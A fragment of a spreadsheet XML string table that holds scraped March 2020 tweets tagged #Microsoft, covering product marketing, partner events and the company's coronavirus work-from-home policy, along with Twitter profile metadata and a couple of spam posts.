    <t>#Microsoft and the #NFL are adding #MicrosoftTeams to the equation and are expanding their alliance to bring more technology to one of the worlds most popular professional sports leagues. #Collaboration #MSTeams https://t.co/cpGe844Uxe</t>
  </si>
  <si>
    <t>{'id': 995183863, 'id_str': '995183863', 'name': 'Valentinos Georgiade', 'screen_name': 'vgeorgiades', 'location': 'Cyprus', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 124, 'listed_count': 46, 'created_at': 'Fri Dec 07 14:27:38 +0000 2012', 'favourites_count': 355, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 823,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'http://pbs.twimg.com/profile_images/2943758420/8de32245fcbc8defad9a00cdf429aef5_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2943758420/8de32245fcbc8defad9a00cdf429aef5_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/995183863/1362494741',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</si>
  <si>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10:00:22 +0000 2020</t>
  </si>
  <si>
    <t>Designing and Deploying Microsoft Exchange Server 2016
https://t.co/oByCORZ9ak
#informationtechnology #exchangeserver #microsoft https://t.co/1IytYQZJQY</t>
  </si>
  <si>
    <t>{'id': 741279053559259136, 'id_str': '741279053559259136', 'name': 'MTC Training - Provider of IT Training', 'screen_name': 'Training_MTC', 'location': 'Sunderland, England', 'description': 'Provider of IT Training and Apprenticeships in the North East.\nFor over 35 years, MTC Training has built a reputation for excellence and quality.\n\n0191 515 3355', 'url': 'https://t.co/4Y27PucGAT', 'entities': {'url': {'urls': [{'url': 'https://t.co/4Y27PucGAT', 'expanded_url': 'https://www.mtc-training.co.uk/', 'display_url': 'mtc-training.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1837, 'friends_count': 1809, 'listed_count': 36, 'created_at': 'Fri Jun 10 14:41:13 +0000 2016', 'favourites_count': 2722, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1887,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'http://pbs.twimg.com/profile_images/1082216903454674945/m4h5BeRt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082216903454674945/m4h5BeRt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/741279053559259136/1582903953',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</si>
  <si>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09:59:47 +0000 2020</t>
  </si>
  <si>
    <t>Why should you replace your #Microsoft CA with GlobalSign #SaaS #CA? GlobalSign manages the #security, high availability and CA operations, ensuring you meet SLAs and compliance audits. Learn how we can help you by visiting the link attached. https://t.co/27fRX9nRNH https://t.co/lPs3FDrz1v</t>
  </si>
  <si>
    <t>{'id': 803889938995564544, 'id_str': '803889938995564544', 'name': 'Andreas Brix', 'screen_name': 'BrixAndreas', 'location': 'Belgien', 'description': 'PKI, Security, SSL, Digital Signing, AATL, eIDAS, CCNA, Digital Signing Service', 'url': 'https://t.co/tnsuzJJ0D3', 'entities': {'url': {'urls': [{'url': 'https://t.co/tnsuzJJ0D3', 'expanded_url': 'http://www.globalsign.com', 'display_url': 'globalsign.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 171, 'friends_count': 333, 'listed_count': 8, 'created_at': 'Wed Nov 30 09:14:31 +0000 2016', 'favourites_count': 101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/822059984066318336/i0iT2KHE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/822059984066318336/i0iT2KHE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/803889938995564544/1508921768',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</si>
  <si>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09:59:35 +0000 2020</t>
  </si>
  <si>
    <t>#Modernization of Web #Applications to #Microsoft #Azure. Validate your expertise in migrating &amp;amp; deploying production web application workloads, applying #DevOps practices, &amp;amp; managing application services in Azure. Read: https://t.co/WWPGGLMola #cto #ilinksystems #ilinkdifference https://t.co/swNCtoZe5v</t>
  </si>
  <si>
    <t>Thu Mar 05 09:59:07 +0000 2020</t>
  </si>
  <si>
    <t>Should you package your products and services? KOGGER is visiting Crayon in Denmark and we are so happy that they invited us to talk about transparency and how to package your products.
#Microsoft #BeTransparentCreateTrust #Microsoft365 #PackagingWorkshop #Denmark https://t.co/cps2iggTyT</t>
  </si>
  <si>
    <t>{'id': 1092851913295568897, 'id_str': '1092851913295568897', 'name': 'KOGGER AS', 'screen_name': 'KoggerA', 'location': 'Norway', 'description': 'KOGGER can help by improving your Digital, Sales and Marketing! We love helping our customers become digital heroes ðŸ¦¸ðŸ¼\u200dâ™‚ï¸ðŸ¦¸ðŸ½\u200dâ™€ï¸#BTCT', 'url': 'https://t.co/St5EzHACCK', 'entities': {'url': {'urls': [{'url': 'https://t.co/St5EzHACCK', 'expanded_url': 'https://kogger.no', 'display_url': 'kogger.no', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 34, 'friends_count': 114, 'listed_count': 0, 'created_at': 'Tue Feb 05 18:26:15 +0000 2019', 'favourites_count': 19,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'http://pbs.twimg.com/profile_images/1189184385926385665/a-OPFvQi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189184385926385665/a-OPFvQi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1092851913295568897/1572959015',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</si>
  <si>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09:58:55 +0000 2020</t>
  </si>
  <si>
    <t>Day 2 of Limpopo Digital Transformation Summit. Office of the Premier GITO discussing the E-government plan. #LimpopoDigitalSummit #Microsoft #ConnectTheWorld #4IR #MeropaSun https://t.co/QBE5gak5Sd</t>
  </si>
  <si>
    <t>{'id': 1235182039890042882, 'id_str': '1235182039890042882', 'name': 'Digital Summit_ZA', 'screen_name': 'DigitalSummit1', 'location': '', 'description': 'The summit is about bringing the ICT sector to Limpopo and creating a market place for people in Limpopo to engage and use the latest technological Advancement', 'url': 'https://t.co/pcT9oDKRxU', 'entities': {'url': {'urls': [{'url': 'https://t.co/pcT9oDKRxU', 'expanded_url': 'http://www.digital-summit.co.za', 'display_url': 'digital-summit.co.za', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Wed Mar 04 12:35:54 +0000 2020', 'favourites_count': 3,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'http://pbs.twimg.com/profile_images/1235182371244302336/oA_Brk8m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235182371244302336/oA_Brk8m_normal.jpg',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</si>
  <si>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09:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Europe here we come! The #HPE and #Microsoft #HybridCloud Summit kicked off in Lisbon Portugal. Lots of interest also here in how we accelerate enterprises with edge-centric and cloud-enabled solutions delivered #aaS. https://t.co/8Mq0BI01nz #HPEAlliances @MicrosoftSpain @HPE_ES https://t.co/uRK9GrkIzy</t>
  </si>
  <si>
    <t>Thu Mar 05 09:51:01 +0000 2020</t>
  </si>
  <si>
    <t>Powerfull showing of strong partnership's  at today's #HPE &amp;amp; #Microsoft #HybridCloud Summit Portugal. Joao Moro HPE, Luis Silva @Microsoft, Carlos Paulino @Equinix &amp;amp; Paulo Ferreira @Axians_ES Axians  kicking off a tremendous Roadshow stop! https://t.co/8Mq0BHIqw1 #HPEAlliances https://t.co/qn48f1F1xp</t>
  </si>
  <si>
    <t>Thu Mar 05 09:49:44 +0000 2020</t>
  </si>
  <si>
    <t>With employees either being quarantined after international travel or encouraged to work remotely due to the #Coronavirus (COVID19), #Microsoft, #Google, LogMeIn, and Cisco are offering free licenses to their meeting collaboration and remote work tools.
https://t.co/qPTzIrNSj7 https://t.co/VfRJAhsxlK</t>
  </si>
  <si>
    <t>{'id': 102966683, 'id_str': '102966683', 'name': 'Dennis Patel', 'screen_name': 'ITMob', 'location': 'Birmingham', 'description': 'IT Mob Ltd are a specialist IT #recruitment agency recruiting mainly in #Leeds, #Sheffield, #York, #Hull and #Manchester .Tel: 0121 569 2366.For jobs:@ITMobjobs', 'url': 'http://t.co/jkN0NsSA49', 'entities': {'url': {'urls': [{'url': 'http://t.co/jkN0NsSA49', 'expanded_url': 'http://www.itmob.co.uk', 'display_url': 'itmob.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2992, 'friends_count': 3017, 'listed_count': 508, 'created_at': 'Fri Jan 08 12:13:45 +0000 2010', 'favourites_count': 9776, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24576,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'http://pbs.twimg.com/profile_images/561556200077004800/Kt3niTjW_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/561556200077004800/Kt3niTjW_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102966683/1562169923', 'profile_link_color': '1B95E0',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</si>
  <si>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09:48:05 +0000 2020</t>
  </si>
  <si>
    <t>Lee Cox, Azure Global Blackbelt, talks about the differences between the various Microsoft #Azurestack Solutions especially #AzurestackHCI and #AzurestackHub 
#Social4UTV #HPE #Microsoft #Hybridcloud Summit Lisbon https://t.co/6QEcf2lzuC</t>
  </si>
  <si>
    <t>Thu Mar 05 09:47:07 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yxnR16  
https://t.co/Cm3x8EVJjz 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/7wIuJiI3W1</t>
  </si>
  <si>
    <t>Thu Mar 05 09:46:33 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus: #Microsoft asks staff in #Seattle area, Silicon Valley to work from home https://t.co/LfppAmwR8N</t>
  </si>
  <si>
    <t>{'id': 16492455, 'id_str': '16492455', 'name': 'NewsBlogged', 'screen_name': 'NewsBlogged', 'location': 'Worldwide', 'description': 'NewsBlogged brings you the latest news, news videos and live news videos from around the world.', 'url': 'https://t.co/s8VpZ0WqP0', 'entities': {'url': {'urls': [{'url': 'https://t.co/s8VpZ0WqP0', 'expanded_url': 'https://newsvideochat.blogspot.com/', 'display_url': 'newsvideochat.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1298, 'friends_count': 12, 'listed_count': 60, 'created_at': 'Sat Sep 27 23:26:19 +0000 2008', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 170128,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'http://pbs.twimg.com/profile_images/1369746354/800px-World_Map_flat_Mercator_bigger_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1369746354/800px-World_Map_flat_Mercator_bigger_normal.png', 'profile_link_color': '4900FF', 'profile_sidebar_border_color': '65B0DA', 'profile_sidebar_fill_color': 'EA7AEE', 'profile_text_color': '3D1957', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 09:44:48 +0000 2020</t>
  </si>
  <si>
    <t>If you share your computer with other members of your household, you will do well to enable different user profiles on your browser. 
https://t.co/RiAykrCa61 #userprofiles #microsoftedge #technology #microsoft https://t.co/NJ8x28dx6A</t>
  </si>
  <si>
    <t>{'id': 11276612, 'id_str': '11276612', 'name': 'MakeTechEasier', 'screen_name': 'MakeTechEasier', 'location': '', 'description': 'Windows, Mac and Linux tutorials, tips and tricks to solve your computer woes', 'url': 'https://t.co/8baNfbyi3S', 'entities': {'url': {'urls': [{'url': 'https://t.co/8baNfbyi3S', 'expanded_url': 'https://www.maketecheasier.com', 'display_url': 'maketecheasier.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7233, 'friends_count': 985, 'listed_count': 401, 'created_at': 'Tue Dec 18 01:53:08 +0000 2007', 'favourites_count': 433, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14665, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDEBDE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103548642365861889/NXtRhBUm_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103548642365861889/NXtRhBUm_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/11276612/1488527651', 'profile_link_color': '336699', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '676767', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 09:41:37 +0000 2020</t>
  </si>
  <si>
    <t>We're at the BusinessTech Digital Banking conference speaking all things Jamf!
Banks are using @JAMFSoftware to bring two ecosystems together, Apple and Microsoft giving employees the choice to choose the best device!
#jamf #apple #mdm #microsoft #enterprise #bankingtech https://t.co/RXLgkXeswr</t>
  </si>
  <si>
    <t>{'id': 702011912259821569, 'id_str': '702011912259821569', 'name': 'Onsite Group', 'screen_name': 'OnsiteGroupZA', 'location': 'South Africa', 'description': 'Connect | Secure | Manage | Support', 'url': 'https://t.co/b0V5Lewigj', 'entities': {'url': {'urls': [{'url': 'https://t.co/b0V5Lewigj', 'expanded_url': 'http://www.onsitegroup.biz', 'display_url': 'onsitegroup.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 38, 'friends_count': 80, 'listed_count': 1, 'created_at': 'Tue Feb 23 06:07:37 +0000 2016', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 230,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'http://pbs.twimg.com/profile_images/838695672731815936/mNFYCPZx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/838695672731815936/mNFYCPZx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/702011912259821569/1582026769', 'profile_link_color': '115599',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</si>
  <si>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09:40:45 +0000 2020</t>
  </si>
  <si>
    <t>Scold me and spank, I was a very bad girl 
 #rock #microsoft https://t.co/UZFWLilqey</t>
  </si>
  <si>
    <t>{'id': 1235239634055106562, 'id_str': '1235239634055106562', 'name': 'Carrie Woods', 'screen_name': 'raimadircdi', 'location': 'North Las Vegas, USA', 'description': 'I realized I was thinking of you, and I began to wonder how long youâ€™d been on my mind. Then it occurred to me: Since I met you, youâ€™ve never left.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 44, 'listed_count': 0, 'created_at': 'Wed Mar 04 16:24:19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'http://pbs.twimg.com/profile_images/1235243895774228481/qe9K9A4y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235243895774228481/qe9K9A4y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235239634055106562/1583340171',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</si>
  <si>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09:39:43 +0000 2020</t>
  </si>
  <si>
    <t>The best sex toy is a vibrator. Like 
 #microsoft #lesbian https://t.co/sG6qecfbdq</t>
  </si>
  <si>
    <t>{'id': 1235309788130574345, 'id_str': '1235309788130574345', 'name': 'Kara Lindberg', 'screen_name': 'lilethoga', 'location': 'Springfield, USA', 'description': 'If I had a flower for every time thought of youâ€¦ I could walk through my garden forever', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Wed Mar 04 21:03:04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'http://pbs.twimg.com/profile_images/1235314247753752585/9znHLplx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235314247753752585/9znHLplx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235309788130574345/1583356941',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</si>
  <si>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09:38:27 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft brings a new Quantum Machine Learning (QML) library to the Quantum Development Kit (QDK) - https://t.co/hiOTAJQmL3  
#machinelearning #ai #quantumMachineLearning #quantumcomputing</t>
  </si>
  <si>
    <t>{'id': 45817377, 'id_str': '45817377', 'name': 'Sumant', 'screen_name': '_sumant', 'location': 'India', 'description': 'Tech Leader | Startup Enthusiast', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1076, 'friends_count': 1951, 'listed_count': 102, 'created_at': 'Tue Jun 09 11:33:40 +0000 2009', 'favourites_count': 199, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11008,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'http://pbs.twimg.com/profile_images/1110802233107447808/K9KnSuIW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110802233107447808/K9KnSuIW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/45817377/1462206554',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</si>
  <si>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09:35:06 +0000 2020</t>
  </si>
  <si>
    <t>Hiring #Microsoft #Azure professionals for your team can be a challenge, but weve got a few tips to help you out. 
Take a peek at our latest blog to find our which hiring mistakes you should avoid: https://t.co/VrpqAuUOt9 https://t.co/jtK52fsRfc</t>
  </si>
  <si>
    <t>Thu Mar 05 09:34:35 +0000 2020</t>
  </si>
  <si>
    <t>Is the #coronavirus truly a #blackswan event or was the #economy already in a fragile state? Cases of the virus appeared in late Dec'19 and in only 2 months, we've seen a massive negative impact in the financial space affecting firms such as #microsoft #mastercard #apple</t>
  </si>
  <si>
    <t>{'id': 1226923879211335680, 'id_str': '1226923879211335680', 'name': 'Alexis Solomon', 'screen_name': 'Solomon_UX', 'location': '', 'description': 'I cater for business goals, user needs, and development to help guide companies on a business and technology front by building products that are user-centered.', 'url': 'https://t.co/C5essDkWNg', 'entities': {'url': {'urls': [{'url': 'https://t.co/C5essDkWNg', 'expanded_url': 'https://www.youtube.com/channel/UC5TlYjdzFKVnNodkBSW9vCg', 'display_url': 'youtube.com/channel/UC5TlYâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Mon Feb 10 17:40:38 +0000 2020', 'favourites_count': 5,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'http://pbs.twimg.com/profile_images/1228005909680599041/EHuglY66_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228005909680599041/EHuglY66_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1226923879211335680/1581614400',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</si>
  <si>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09:33:40 +0000 2020</t>
  </si>
  <si>
    <t>With so many companies forced to send coworkers to work from home due to Coronavirus, could this be the final SHIFT for us to see how well remote working can operate for both company and employee?
#remotework #remoteagency #Microsoft #SharePoint #workfromanywhere https://t.co/ojX70XmWXF</t>
  </si>
  <si>
    <t>{'id': 778983674205376513, 'id_str': '778983674205376513', 'name': 'Silicon Reef', 'screen_name': 'SiliconReefUK', 'location': 'England, United Kingdom', 'description': 'Design and development agency specialising in #SharePoint, #Azure and #O365.', 'url': 'https://t.co/o1ApZeu3Mz', 'entities': {'url': {'urls': [{'url': 'https://t.co/o1ApZeu3Mz', 'expanded_url': 'http://www.siliconreef.co.uk', 'display_url': 'siliconreef.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 120, 'friends_count': 203, 'listed_count': 1, 'created_at': 'Thu Sep 22 15:45:55 +0000 2016', 'favourites_count': 327, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 608,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'http://pbs.twimg.com/profile_images/1097432607443349505/eIbut4zR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1097432607443349505/eIbut4zR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/778983674205376513/1550483310',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</si>
  <si>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09:33:03 +0000 2020</t>
  </si>
  <si>
    <t>@ARDELLd #Microsoft is a work from home if you can. People are still working on campus. My guess is it is the same for most companies like that, including #Google</t>
  </si>
  <si>
    <t>{'id': 20479405, 'id_str': '20479405', 'name': 'Kevin', 'screen_name': 'kevin22262', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 405, 'friends_count': 1018, 'listed_count': 19, 'created_at': 'Mon Feb 09 23:59:13 +0000 2009', 'favourites_count': 33033, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22319,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'http://pbs.twimg.com/profile_images/915389821249400832/mXS41IEH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/915389821249400832/mXS41IEH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20479405/1565047509',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</si>
  <si>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09:32:33 +0000 2020</t>
  </si>
  <si>
    <t>ZDNet | Tests suggest #Microsoft is letting enterprise customers completely... #MicrosoftWindows https://t.co/uY32HAg5x4 https://t.co/ryBBya0ckQ</t>
  </si>
  <si>
    <t>{'id': 2797590928, 'id_str': '2797590928', 'name': 'Windows 10 News', 'screen_name': 'Windows10Info', 'location': '', 'description': 'The most trending news about Windows 10 as collected by Trendolizer (unofficial)', 'url': 'http://t.co/3auOROLyuJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/3auOROLyuJ', 'expanded_url': 'http://windows10.trendolizer.com', 'display_url': 'windows10.trendolizer.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6988, 'friends_count': 386, 'listed_count': 143, 'created_at': 'Wed Oct 01 08:24:23 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 34657,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'http://pbs.twimg.com/profile_images/635221363423186944/ymzJJ315_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/635221363423186944/ymzJJ315_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2797590928/1412152113',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</si>
  <si>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09:32:21 +0000 2020</t>
  </si>
  <si>
    <t>Data Windows 10 1909 sends to #Microsoft can be totally shut off, but doing so is risky | ZDNet... https://t.co/8NCThK4AoZ https://t.co/xYzMKyQoMf</t>
  </si>
  <si>
    <t>Thu Mar 05 09:31:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Pushes Employees to Work From Home Due to Coronavirus Concerns #microsoft #coronavirus https://t.co/UkEMNRj9SO https://t.co/wDvv5aYdKw</t>
  </si>
  <si>
    <t>Thu Mar 05 09:30:20 +0000 2020</t>
  </si>
  <si>
    <t>Do you like #Microsoft's new colorful #icons for #Windows 10? https://t.co/paxBTm3uWW https://t.co/XXROyTfozc</t>
  </si>
  <si>
    <t>{'id': 995685023285170176, 'id_str': '995685023285170176', 'name': 'Afrika Dynamics', 'screen_name': 'AfrikaDynamics', 'location': 'Africa', 'description': 'Innovative Agency: Providing you a competitive advantage in a connected world via #branding, #consultancy, #graphicdesign, #marketing, #seo &amp; #webdesign', 'url': 'https://t.co/ZU7zEU0K7V', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZU7zEU0K7V', 'expanded_url': 'https://www.afrika-dynamics.com', 'display_url': 'afrika-dynamics.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 82, 'listed_count': 3, 'created_at': 'Sun May 13 15:19:43 +0000 2018', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 117,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'http://pbs.twimg.com/profile_images/1011230933868056576/bwv_5eIp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1011230933868056576/bwv_5eIp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/995685023285170176/1582194011',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</si>
  <si>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09:30:17 +0000 2020</t>
  </si>
  <si>
    <t>Is Progressive Web Apps ( #PWA ) the future? Because top brands #Google &amp;amp; #Microsoft have already started loving it. https://t.co/tC6MDwgHbi #ProgressiveWebApps #webapps #nativeappexperience #nativeapps #webapplication #mobileapp #websites #mobilewebsite</t>
  </si>
  <si>
    <t>{'id': 1027822150730694656, 'id_str': '1027822150730694656', 'name': 'Annora Powell', 'screen_name': 'annorapowellgm1', 'location': 'United States, India', 'description': 'Web Development Services Provider (#Angular, #Magento, #dotNET, #WordPress) in #USA and #India, #Hire Sr. or Jr. #WebDeveloper', 'url': 'https://t.co/pIL715yYCq', 'entities': {'url': {'urls': [{'url': 'https://t.co/pIL715yYCq', 'expanded_url': 'http://bit.ly/2HoaTpQ', 'display_url': 'bit.ly/2HoaTpQ', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3209, 'friends_count': 3396, 'listed_count': 19, 'created_at': 'Fri Aug 10 07:41:11 +0000 2018', 'favourites_count': 811, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2086, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1027823254063407107/PIvR1cSs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027823254063407107/PIvR1cSs_normal.jpg',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</si>
  <si>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09:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat. #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB520hNJ</t>
  </si>
  <si>
    <t>Arrows award-winning CSP programme offers Partners the chance to build cloud services around trusted #Microsoft technology. https://t.co/uT0z7TV2py #ArrowCloud #MicrosoftCSP #ArrowSphere</t>
  </si>
  <si>
    <t>{'id': 292250604, 'id_str': '292250604', 'name': 'Arrow ECS UK', 'screen_name': 'ArrowECS_UK', 'location': 'Harrogate', 'description': 'The Arrow ECS UK account: Five years out through driving innovation forward.', 'url': 'http://t.co/5i7g1T0UJj', 'entities': {'url': {'urls': [{'url': 'http://t.co/5i7g1T0UJj', 'expanded_url': 'http://www.arrowecs.co.uk', 'display_url': 'arrowecs.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3603, 'friends_count': 2263, 'listed_count': 327, 'created_at': 'Tue May 03 10:38:57 +0000 2011', 'favourites_count': 352, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14612, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '080008', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/460703965676457984/hLEN2daA_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/460703965676457984/hLEN2daA_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/292250604/1398675378', 'profile_link_color': '424242', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E6F1FA', 'profile_text_color': '00539B', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Arrows award-winning CSP programme offers Partners the chance to build cloud services around trusted #Microsoft technology. https://t.co/QpSKIpBcY1 #ArrowCloud #MicrosoftCSP #ArrowSphere</t>
  </si>
  <si>
    <t>{'id': 627194536, 'id_str': '627194536', 'name': 'Arrow Cloud UK', 'screen_name': 'Arrow_Cloud_UK', 'location': 'England, United Kingdom', 'description': 'Welcome to Arrow Cloud UK. Five years out through driving innovation forward.', 'url': 'https://t.co/CPsinLHTJb', 'entities': {'url': {'urls': [{'url': 'https://t.co/CPsinLHTJb', 'expanded_url': 'http://www.arrowecs.co.uk/solutions/arrow-cloud/arrow-cloud-enablement-programme', 'display_url': 'arrowecs.co.uk/solutions/arroâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 775, 'friends_count': 581, 'listed_count': 60, 'created_at': 'Thu Jul 05 08:24:16 +0000 2012', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3270, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '424242', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000502462016/2048d1ade461161b0afc764dd6f90ed0_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000502462016/2048d1ade461161b0afc764dd6f90ed0_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/627194536/1399383584',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</si>
  <si>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09:29:35 +0000 2020</t>
  </si>
  <si>
    <t>According to #Gartner, More than 90% of organizations that dont use professional services assistance for #CloudMigrations will fail to achieve the Agility and Efficiency expected
#HPE #Microsoft #Hybridcloud Summit Lisbon #HPEGreenlake @HPE_HybridCloud #HPEinfluencer #Azure https://t.co/222X6EQlJy</t>
  </si>
  <si>
    <t>Thu Mar 05 09:28:21 +0000 2020</t>
  </si>
  <si>
